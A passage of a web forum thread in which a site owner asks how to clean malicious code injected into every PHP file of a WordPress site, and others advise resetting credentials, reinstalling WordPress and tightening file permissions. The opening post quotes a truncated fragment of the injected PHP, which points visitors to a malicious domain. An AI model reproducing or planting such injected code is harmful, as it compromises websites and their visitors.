40 posts
  • Australia
  • Bought between 100 and 499 items
  • Has been a member for 2-3 years
razzc says

My WP site’s php files have got some code in first line of the codes in all php files. I have been sitting cleaning it up and have done most of them. I was wondering if anyone can please let me know if this is all I would have to do or there is more to it? It has infected the site that just went live a couple of days ago.

I just don’t want to recreate the site.

Its from some site turnitupnow.net if someone knows what I am talking about. I don’t think it would be appropriate to paste the entire nasty code in here but it looks like:

if(!$sessdt_o) and { $sessdt_f = “102”; if(!@headers_sent()) and else { echo “u = “http://turnitupnow.net/?rnd=”.$sessdt_f.substr($ses/strong>

Its a lot longer then this. I have deleted more then half of this poisonous code. Hopefully its ok to post it in here.

Thanks everyone in advanced.

812 posts
  • Bought between 10 and 49 items
  • Exclusive Author
  • Has been a member for 4-5 years
iamthwee says

If it was me I would have started from fresh, changed all my ftp passwords and wordpress passwords.

Then go through the wp files and lock down the permissions.

If that is not possible you should at LEAST change your ftp password and WP admin passwords.

725 posts WordPress Ninja
  • Envato Studio (Microlancer) Beta Tester
  • Elite Author
  • Sold between 100 000 and 250 000 dollars
  • Most Wanted Bounty Winner
  • Repeatedly Helped protect Envato Marketplaces against copyright violations
  • Bought between 10 and 49 items
  • Exclusive Author
+3 more
TylerQuinn says

1. Change all your info, FTP , WP passwords and database passwords.

2. I would delete everything in the directory as you never know if they added a back door (you can get your uploaded content, just make a copy of it and scan it for anything weird.) and then upload a fresh install of the latest WP.

3. Install with all your new DB login info, all you need to do is create the wp-config file manually and it will hook right back up to all of your DB content.

4. Contact your host if you have more than one domain on that hosting account. Just because the WP site is hacked does not mean they came into your data from that site.

5. I would also run a local scan on your computer to make sure there is nothing stealing your PWs.

488 posts
  • Sold between 10 000 and 50 000 dollars
  • Bought between 50 and 99 items
  • Has been a member for 5-6 years
  • United Kingdom
  • Won a Competition
  • Author had a File in an Envato Bundle
  • Exclusive Author
+2 more
PixelBuffet says

Unfortunately to make sure it’s secure, you’re going to have to do as Tyler has put above. Anything less and you can’t be sure.

Also once you get the site back up and running, research every plugin you’ve used to see if anyone has reported vulnerabilities.

I had a WP site hacked in a similar way, and it was because they exploited a vulnerability in a plugin. Obviously after re-building, I found another way of solving the problem without that plugin and everything has been fine since.

1313 posts
  • Indonesia
  • Has been a member for 3-4 years
  • Exclusive Author
  • Grew a moustache for the Envato Movember competition
  • Bought between 1 and 9 items
  • Sold between 5 000 and 10 000 dollars
canimalition says

One thing you should dont forget, BACKUP ;) I doing this for all my content I have using Internet Connection.

FYI : If you have a Twitter account or something, do not CLICK any link you didn’t know about the link, or if you got the link using bitl.ly, example, bit.ly/fhrfjf, add plus + after the link, example bit.ly/fhrfjf+ , so you will know what exactly link or the real link site on the inside of short link.

This i got in my twitter

\\

and adding + after the link, here I got:

\\

This link got more than 5000+ clicks. OMG

That’s information from me to you ALL :)

40 posts
  • Australia
  • Bought between 100 and 499 items
  • Has been a member for 2-3 years
razzc says

@iamthwee, @TylerQuinn, @PixelBuffet and @canimalition

Thank you all for the support. Like TylerQuinn said – I had to clean everything guys and back to ground zero. I sus one of the theme authors that I bought a theme from at themeforest. They weren’t very helpful and I had a go at them. I had to give them my admin credentials to help with css tweaks. So the morale of the story is that you don’t be a moron like me and trust someone you don’t know and if you do, don’t have a go at them and you do both, you change your admin credentials straight away.

Thanks again fellows.

40 posts
  • Australia
  • Bought between 100 and 499 items
  • Has been a member for 2-3 years
razzc says

If it was me I would have started from fresh, changed all my ftp passwords and wordpress passwords.

Then go through the wp files and lock down the permissions.

If that is not possible you should at LEAST change your ftp password and WP admin passwords.

How do you lock down permissions?

812 posts
  • Bought between 10 and 49 items
  • Exclusive Author
  • Has been a member for 4-5 years
iamthwee says

^^

Well I tend to follow this: http://codex.wordpress.org/Changing_File_Permissions

As a guideline, although you have to test your site to see if some files need different permissions, especially if you’re using a script to write to a folder or dynamically re size an image e.g timthumb.

One thing Tyler mentioned which is highly important… Your security is only as good as the machine your uploading it from. So if you computer is rife with spyware and virii, it won’t matter what you do to lock down your website….

Also, something that hasn’t been mentioned is try avoid, uploading/signing on from an unsecured connection. With the rise in popularity of coffee franchises offering free UNSECURED wifi, a lot of people out there are logging on – leaving their logon details open to ‘snoopers’ on the network- unless of course, if you’re using https, but this is unlikely for WP-logons.

40 posts
  • Australia
  • Bought between 100 and 499 items
  • Has been a member for 2-3 years
razzc says

Thanks iamthwee. I think I shouldn’t allow browsers to remember my credentials. I do that simply because it’s easier to login. Too lazy for my own good.

Thanks for the thoroughness :)
3671 posts Community Moderator
  • Has been a member for 5-6 years
  • Contributed a Tutorial to a Tuts+ Site
  • Netherlands
  • Community Moderator
  • Envato Studio (Microlancer) Beta Tester
  • Sold between 10 000 and 50 000 dollars
  • Repeatedly Helped protect Envato Marketplaces against copyright violations
  • Exclusive Author
+4 more
Joost Volunteer moderator says

Thanks iamthwee. I think I shouldn’t allow browsers to remember my credentials. I do that simply because it’s easier to login. Too lazy for my own good. Thanks for the thoroughness :)

I don’t quite understand how this posed a security risk, as nobody had physical access to your machine, right?

EDIT : Nevermind, I missed the piece were iamthwee spoke about your machine being compromised ;) Of course then it’s not too great to have the passwords stored in your browser unencrypted (set a master password ) – but for WiFi sniffing it doesn’t matter, and it’s even quite a nice prevention against keylogging (as you don’t type your password for the logger to see)

by
by
by
by
by
by